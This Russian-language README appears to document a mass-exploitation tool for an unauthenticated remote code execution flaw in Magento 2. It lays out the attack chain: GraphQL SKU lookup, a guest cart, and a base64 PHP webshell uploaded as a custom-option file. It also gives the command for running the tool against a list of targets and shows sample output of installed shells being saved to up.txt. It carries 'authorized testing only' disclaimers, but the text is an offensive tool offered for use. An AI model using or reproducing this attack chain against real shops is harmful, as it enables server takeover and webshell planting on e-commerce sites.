
Magento 2 Unauthenticated RCE Exploit – Загружает PHP-вебшелл через поиск товара GraphQL и пользовательские опции корзины гостя. Многопоточный, автоматически определяет SKU и сохраняет URL активных шеллов в up.txt. Только для авторизованного тестирования безопасности.
⚠️ Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности. Несанкционированное использование против систем, которые вам не принадлежат, незаконно.
Этот эксплойт нацелен на критическую неаутентифицированную уязвимость удалённого выполнения кода (RCE) в Magento 2 (Adobe Commerce). Объединяя поиск товара через GraphQL, создание гостевой корзины и вредоносную загрузку файла через настраиваемые параметры товара, злоумышленник может загрузить PHP-веб-шелл и получить произвольное выполнение кода на целевом сервере.
Уязвимость позволяет удалённому злоумышленнику записать PHP-файл в файловую систему сервера, а затем обратиться к нему для выполнения системных команд, чтения/записи файлов и полной компрометации установки Magento.
Shinday)up.txt/graphql./rest/default/V1/guest-carts для получения ID корзины./rest/default/V1/guest-carts/{cart_id}/items с PHP-веб-шеллом в кодировке base64 в качестве файла настраиваемого параметра./pub/media/custom_options/quote/... или /media/custom_options/quote/....Shinday в ответе.up.txt.Queue, unicode и другие модули, специфичные для Python 2)requests, urllib3Установка зависимостей:
pip install requests urllib3
python exploit.py <list.txt>
<list.txt> – файл, содержащий базовые URL целей (по одному на строку), с http:///https:// или без них.https://example.com
http://shop.test
magento2.target.net
up.txt в текущем каталоге.python exploit.py targets.txt
[*] Total targets: 5
[*] Start time: 2025-03-15 12:00:00
[*] Starting 5 threads...
[Thread 1] Processing: https://example.com
[+] SKU : 24-WG080
[+] CART : 8f7c3e9a-1b2f-4d5e-9a8b-7c6d5e4f3a2b
[+] Upload Status : 200
[+] Webshell terpasang: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
[✓] Saved to up.txt: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
Загруженный PHP-файл представляет собой простой файловый менеджер (называется как xxxxx_shin.php), который отвечает на запросы веб-интерфейсом файлового проводника. Он содержит уникальный маркер Shinday, который скрипт использует для проверки успешной загрузки.
Не оставляйте этот шелл в системе после тестирования — немедленно удалите его.
/media/custom_options/ на наличие неожиданных PHP-файлов.Данное программное обеспечение предоставляется только для образовательных и авторизованных целей тестирования на проникновение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Вы должны получить явное письменное разрешение от владельца системы перед запуском этого эксплойта против любой цели. Несанкционированный доступ к компьютерным системам является уголовным преступлением в большинстве юрисдикций.
Более подробный отказ от ответственности можно увидеть на обложке Jenderal92. Ознакомиться с ним можно ЗДЕСЬ !!!